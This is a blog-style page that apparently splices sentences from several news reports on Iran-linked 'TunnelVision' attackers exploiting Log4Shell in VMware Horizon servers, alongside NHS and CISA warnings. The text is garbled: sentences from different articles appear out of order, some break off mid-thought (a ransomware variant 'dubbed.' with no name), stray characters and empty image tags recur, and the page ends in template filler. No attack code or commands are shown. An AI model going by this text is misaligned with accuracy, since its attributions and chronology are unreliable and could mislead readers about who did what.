![]() The cybersecurity company said it's associating the attacks to a separate Iranian cluster not because they are unrelated, but owing to the fact that "there is at present insufficient data to treat them as identical to any of the aforementioned attributions. ![]() SentinelOne also said it identified similarities in the mechanism used to execute the reverse web shell with another PowerShell-based implant called PowerLess that was disclosed by Cybereason researchers earlier this month.Īll through the activity, the threat actor is said to have utilized a GitHub repository known as "VmWareHorizon" under the username "protections20" to host the malicious payloads. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). The above list represents a very small snapshot of the widespread effect. Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. The PowerShell commands are used as a launchpad to download tools like Ngrok and run further commands by means of reverse shells that are employed to drop a PowerShell backdoor that's capable of gathering credentials and executing reconnaissance commands. Multiple VMware products were identified to be at risk from the Log4j issues, including VMware Horizon, vCenter Server and vRealize Operations. "TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement," the researchers said. NHS warns of hackers exploiting Log4Shell in VMware Horizon By Bill Toulas Janu09:29 AM 0 UK's National Health Service (NHS) has published a cyber alert warning of an unknown threat. "TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions," SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky said in a report, with the intrusions detected in the Middle East and the U.S.Īlso observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw ( CVE-2018-13379) and the Microsoft Exchange ProxyShell vulnerability to gain initial access into the target networks for post-exploitation. Reports emerged over the weekend that VMware ESXi servers left vulnerable and unpatched against a remotely exploitable bug from 2021 were compromised and scrambled by a ransomware variant dubbed. ![]() ![]() A "potentially destructive actor" aligned with the government of Iran is actively exploiting the well-known Log4j vulnerability to infect unpatched VMware Horizon servers with ransomware.Ĭybersecurity firm SentinelOne dubbed the group " TunnelVision" owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker Phosphorus as well as Charming Kitten and Nemesis Kitten. CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |